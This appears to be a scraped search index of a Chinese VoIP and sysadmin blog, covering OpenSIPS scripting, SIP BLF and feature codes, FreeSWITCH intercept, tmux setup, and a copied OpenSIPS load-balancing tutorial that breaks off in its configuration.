正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! **逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 出了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。","title":"常用语句"},{"content":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不在执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... } ","permalink":"https://wdd.js.org/opensips/ch5/return/","summary":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不在执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... } ","title":"使用return语句减少逻辑嵌套"},{"content":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。\n","permalink":"https://wdd.js.org/opensips/ch5/core-var/","summary":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。","title":"核心变量说明"},{"content":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。\n","permalink":"https://wdd.js.org/posts/2021/03/rggbsl/","summary":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。","title":"网页分享到微信添加缩略图"},{"content":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","permalink":"https://wdd.js.org/network/pz06t2/","summary":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","title":"websocket tcp keepalive 机制调研"},{"content":"功能描述 用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没法办用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","permalink":"https://wdd.js.org/opensips/ch9/feature-code/","summary":"功能描述 用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没法办用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","title":"SIP feature codes SIP功能码"},{"content":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc [03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] sofia/external/8004@wdd.cc intercept(6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1)\n常见的使用场景:\n某个电话正在振铃,但是没人接。如果我的话机通过BLF监控了这个分机,就可以通过按键来用我自己的话机代接正在振铃的话机。 参考 https://www.yuque.com/wangdd/fyikfz/lawr6v https://www.yuque.com/wangdd/fyikfz/lawr6v ","permalink":"https://wdd.js.org/freeswitch/intercept/","summary":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc [03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] sofia/external/8004@wdd.","title":"FS intercept拦截"},{"content":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","permalink":"https://wdd.js.org/posts/2021/03/mcbqod/","summary":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","title":"RFC阅读神器 rfcreader"},{"content":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","permalink":"https://wdd.js.org/posts/2021/03/yroxga/","summary":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","title":"oh my tmux tmux的高级定制"},{"content":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往时例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有再打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 466 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=108 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgx 9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@ d.cc\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt; \u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgx 9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt; \u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt; \u0026lt;remote\u0026gt; \u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/remote\u0026gt; \u0026lt;local\u0026gt; \u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/local\u0026gt; \u0026lt;/dialog\u0026gt; \u0026lt;/dialog-info\u0026gt; 请求体的格式说明参见:https://tools.ietf.org/html/rfc4235#section-4\n挂断Body \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:8001@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;45f1115c-fc32-1239-7198-b827 6c4366\u0026#34; call-id=\u0026#34;45f1115c-fc32-1239-7198-b827eb6c4366\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;terminated\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:0000000000@192.168.2.53\u0026lt;/identity\u0026gt;\u0026lt; rget uri=\u0026#34;sip:0000000000@192.168.2.53\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; 参考 https://www.opensips.org/Documentation/Tutorials-Presence-PuaDialoinfoConfig https://www.yuque.com/wangdd/fyikfz/qs2vqx https://tools.ietf.org/html/rfc4235 ","permalink":"https://wdd.js.org/opensips/ch9/blf-note/","summary":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往时例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有再打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.","title":"BLF功能笔记"},{"content":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations. To be more precise, when routing, OpenSIPS will consider the less loaded destination not the destination with the smallest number of ongoing calls, but the destination with the largest available slot.\nAlso, the \u0026ldquo;load-balancing\u0026rdquo; (LB) module is able to receive feedback from the destinations (if they are capable of). This mechanism is used for notifying OpenSIPS when the maximum capacity of a destination changed (like a GW with more or less E1 cards).\nThe \u0026ldquo;load-balancing\u0026rdquo; functionality comes to enhance the \u0026ldquo;dispatcher\u0026rdquo; one. The difference comes in having or not load information about the destinations where you are routing to:\nDispatcher has no load information - it just blindly forwards calls to the destinations based on a probabilistic dispersion logic. It gets no feedback about the load of the destination (like how many calls that were sent actually were established or how many are still going). Load-balancer is load driven - LB routing logic is based primary on the load information. The LB module is using the DIALOG module in order to keep trace of the load (ongoing calls). 2. Load Balancing - how it works When looking at the LB implementation in OpenSIPS, we have 3 aspects:\n2.1 Destination set A destination is defined by its address (a SIP URI) and its description as capacity.\nForm the LB module perspective, the destinations are not homogeneous - they are not alike; and not only from capacity point of view, but also from what kind of services/resources they offer. For example, you may have a set of Yate/Asterisk boxes for media-related services -some of them are doing transcoding, other voicemail or conference, other simple announcement , other PSTN termination. But you may have mixed boxes - one box may do PSTN and voicemail in the same time. So each destination from the set may offer a different set of services/resources.\nSo, for each destination, the LB module defines the offered resources, and for each resource, it defines the capacity / maximum load as number of concurrent calls the destination can handle for that resource.\nExample: 4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN id group_id dst_uri resources 1 1 sip:yate1.mycluster.net transc=30; pstn=32 2 1 sip:yate2.mycluster.net vm=100; transc=10 3 1 sip:yate3.mycluster.net vm=50; conf=300 4 1 sip:yate4.mycluster.net vm=10;conf=10;transc=10;pstn=32 For runtime, the LB module provides MI commands for:\nreloading the definition of destination sets changing the capacity for a resource for a destination 2.2 Invoking Load-balancing Using the LB functionality is very simple - you just have to pass to the LB module what kind of resources the call requires.\nThe resource detection is done in the OpenSIPS routing script, based on whatever information is appropriated. For example, looking at the RURI (dialed number) you can see if the call must go to PSTN or if it a voicemail or conference number; also, by looking at the codecs advertised in the SDP, you can figure out if transcoding is or not also required.\nif (!load_balance(\u0026#34;1\u0026#34;,\u0026#34;transc;pstn\u0026#34;)) { sl_send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } The first parameter of the function identifies the LB set to be used (see the group_id column in the above DB snapshot). Second parameter is list of the required resource for the call. A third optional parameter my be passed to instruct the LB engine on how to estimate the load - in absolute value (how many channels are used) or in relative value (how many percentages are used).\nThe load_balance() will automatically create the dialog state for the call (in order to monitor it) and will also allocate the requested resources for it (from the selected box).\nThe function will set as destination URI ($du) the address of the selected destination/box.\nThe resources will be automatically released when the call terminates.The LB module provides an MI function that allows the admin to inspect the current load over the destinations.\n2.3 The LB logic The logic used by the LB module to select the destination is:\ngets the destination set based on the group_id (first parameter of the load_balance() function) selects from the set only the destinations that are able to provide the requested resources (second parameter of the load_balance() function) for the selected destinations, it evaluated the current load for each requested resource the winning destination is the one with the biggest value for the minimum available load per resources. Example:\n4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN when calling load_balance(\u0026ldquo;1\u0026rdquo;,\u0026ldquo;transc;pstn\u0026rdquo;) -\u0026gt;\nonly boxes (1) and (4) will be selected at as they offer both transcoding and pstn evaluating the load : (1) transcoding - 10 channels used; PSTN - 18 used (4) transcoding - 9 channels used; PSTN - 16 used evaluating available load (capacity-load) : - (1) transcoding - 20 channels used; PSTN - 14 used - (4) transcoding - 1 channels used; PSTN - 16 used for each box, the minimum available load (through all resources) (1) 14 (PSTN) (2) 1 (transcoding) final selected box in (1) as it has the the biggest (=14) available load for the most loaded resource.\nThe selection algorithm tries to avoid the intensive usage of a resource per box.\n2.4 Disabling and Pinging The Load Balancer modules provides couple of functionalities to help in dealing with failures of the destinations. The actual detection of a failed destination (based on the SIP traffic) is done in the OpenSIPS routing script by looking at the codes of the replies you receive back from the destinations (see the example at the end of tutorial).Once a destination is detected at failed, in script, you can mark it as disabled via the lb_disable() function - once marked as disabled, the destination will not be used anymore in the LB process (it will not be considered a possible destination when routing calls).For a destination to be set back as enabled, there are two options:\nuse the MI command lb_status to do it manually, from outside OpenSIPS based on probing - the destination must have the SIP probing/pinging enabled - once the destination starts replying with 200 OK replies to the SIP pings (see the probing_reply_codes option. To enable pinging, you need first to set probing_interval to a non zero value - how often the pinging should be done. The pinging will be done by periodically sending a OPTIONS SIP request to the destination - see probing_method option.To control which and when a destination is pinged, there is the probe_mode column in the load_balancer table - see table definition. Possible options are:\n0 no pinging at any time 1 ping only if in disabled state (used for auto re-enabling of destinations) 2 ping all the time - it will disable destination if fails to answer to pings and enable it back when starts answering again. 2.5 RealTime Control over the Load Balancer The Load Balancer module provides several MI functions to allow you to do runtime changes and to get realtime information from it.Pushing changes at runtime:\nlb_reload - force reloading the entire configuration data from DB - see more.. lb_resize - change the capacity of a resource for a destination - see more.. lb_status - change the status of a destination (enable/disable) - see more.. For fetching realtime information :\nlb_list - list the load on all destinations (per resource) - see more.. lb_status - see the status of a destination (enable/disable) - see more.. 3. Study Case: routing the media gateways Here is the full configuration and script for performing LB between media peers.\n3.1 Configuration Let\u0026rsquo;s consider the following case: a cluster of media servers providing voicemail service and PSTN (in and out) service. So the boxes will be able to receive calls for Voicemail or for PSTN termination, but they will be able to send back calls only for PSTN inbound.\nWe also want the destinations to be disabled from script (when a failure is detected); The re-enabling of the destinations will be done based on pinging - we do pinging only when the destination is in \u0026ldquo;failed\u0026rdquo; status.\n4 destinations/boxes in the LB set\noffers 50 channels for voicemail and 32 for PSTN offers 100 voicemail channels offers 50 voicemail channels offers 10 voicemail and 64 PSTN This translated into the following setup:\nid group_id dst_uri resources prob_mode 1 1 sip:yate1.mycluster.net vm=50; pstn=32 1 2 1 sip:yate2.mycluster.net vm=100 1 3 1 sip:yate3.mycluster.net vm=50 1 4 1 sip:yate4.mycluster.net vm=10;pstn=64 1 3.2 OpenSIPS Scripting debug=1 memlog=1 fork=yes children=2 log_stderror=no log_facility=LOG_LOCAL0 disable_tcp=yes disable_dns_blacklist = yes auto_aliases=no check_via=no dns=off rev_dns=off listen=udp:xxx.xxx.xxx.xxx:5060 # REPLACE here with right values loadmodule \u0026#34;modules/maxfwd/maxfwd.so\u0026#34; loadmodule \u0026#34;modules/sl/sl.so\u0026#34; loadmodule \u0026#34;modules/db_mysql/db_mysql.so\u0026#34; loadmodule \u0026#34;modules/tm/tm.so\u0026#34; loadmodule \u0026#34;modules/uri/uri.so\u0026#34; loadmodule \u0026#34;modules/rr/rr.so\u0026#34; loadmodule \u0026#34;modules/dialog/dialog.so\u0026#34; loadmodule \u0026#34;modules/mi_fifo/mi_fifo.so\u0026#34; loadmodule \u0026#34;modules/mi_xmlrpc/mi_xmlrpc.so\u0026#34; loadmodule \u0026#34;modules/signaling/signaling.so\u0026#34; loadmodule \u0026#34;modules/textops/textops.so\u0026#34; loadmodule \u0026#34;modules/sipmsgops/sipmsgops.so\u0026#34; loadmodule \u0026#34;modules/load_balancer/load_balancer.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;rr\u0026#34;,\u0026#34;enable_double_rr\u0026#34;,1) modparam(\u0026#34;rr\u0026#34;,\u0026#34;append_fromtag\u0026#34;,1) 